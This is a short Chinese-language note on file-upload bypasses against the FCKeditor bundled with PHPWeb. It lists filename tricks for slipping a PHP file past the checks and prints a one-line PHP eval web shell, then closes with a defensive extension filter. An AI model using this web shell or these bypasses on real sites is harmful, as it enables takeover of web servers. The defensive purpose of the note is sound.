首先介绍个检查木马的工具  网络安全狗，可以检测一句话木马：

 黑客会上传shell.php;.jpg 类似这种文件，新版的fckeditor会进行把.变成_  可是phpweb自带的fckeditor压根就没有这个功能。

 不过有的话 黑客也会绕过。绕过的方法

 提交shell.php+空格绕过
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
 继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹，只检测了第一级的目录，如果跳到二级目录就不受限制。

此文件里面的内容是：

<?php eval($_POST[sb])?>  一句话木马

解决方法 。文件名进行过滤 只要文件里面含有。php 提示

 //检查扩展名
 if (in_array($file_ext, $ext_arr) === false||strpos($_POST['fileName'],"php")) {
  alert("上传文件扩展名是不允许的扩展名。");
 }